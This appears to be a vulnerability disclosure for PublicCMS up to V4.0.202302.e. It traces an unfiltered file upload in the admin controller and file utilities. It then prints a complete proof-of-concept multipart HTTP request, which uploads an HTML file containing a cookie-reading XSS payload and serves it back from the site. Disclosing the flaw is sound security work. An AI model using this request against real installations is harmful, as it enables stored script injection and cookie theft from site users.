Vulnerability Product:PublicCMS
Vulnerability version:<=V4.0.202302.e
Vulnerability type:File Upload
Vulnerability Details:
1. Locate com.publiccms.controller.admin.cms.CmsWebFileAdminController#upload and find that this function directly splices the file name when uploading the file without any filtering.
![输入图片说明](https://foruda.gitee.com/images/1720065890536771121/7fb0a88b_13737655.png "屏幕截图")
2. Follow up on com.publiccms.common.tools.CmsFileUtils#upload. You can see that after reading the uploaded file name and content, the file is created directly without any filtering. Therefore, there is an arbitrary file upload vulnerability.
![输入图片说明](https://foruda.gitee.com/images/1720065923216427939/b36d6f43_13737655.png "屏幕截图")
3. Construct POC, which can only be triggered after logging in. The values of cookie and _csrf need to be replaced.
```
POST /admin/cmsWebFile/doUpload HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynfg1WTfJA3IT8Ekc
Cookie: iwSID=a034c2ae-fefa-4483-941f-9d50f228c941; PUBLICCMS_ANALYTICS_ID=dfa77a63-31c7-484e-8f81-3770b770500b; PUBLICCMS_ADMIN=1_e0bf3e95-ae30-47b7-87f2-296e79ea7c00; JSESSIONID=6C4304D314A09443F51A7F87B4A4C765
Connection: close
Content-Length: 738
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="_csrf"
e0bf3e95-ae30-47b7-87f2-296e79ea7c00
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="path"
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="files"; filename="dotest.html"
Content-Type: image/jpeg
<img src=1 onerror=alert(document.cookie)>
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="overwrite"
on
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="encoding"
utf-8
------WebKitFormBoundarynfg1WTfJA3IT8Ekc
Content-Disposition: form-data; name="ajax"
1
------WebKitFormBoundarynfg1WTfJA3IT8Ekc--
```
![输入图片说明](https://foruda.gitee.com/images/1720065981318599039/3968c028_13737655.png "屏幕截图")
```
http://localhost:8080/webfile/dotest.html
```
![输入图片说明](https://foruda.gitee.com/images/1720066011708109942/c9babb29_13737655.png "屏幕截图")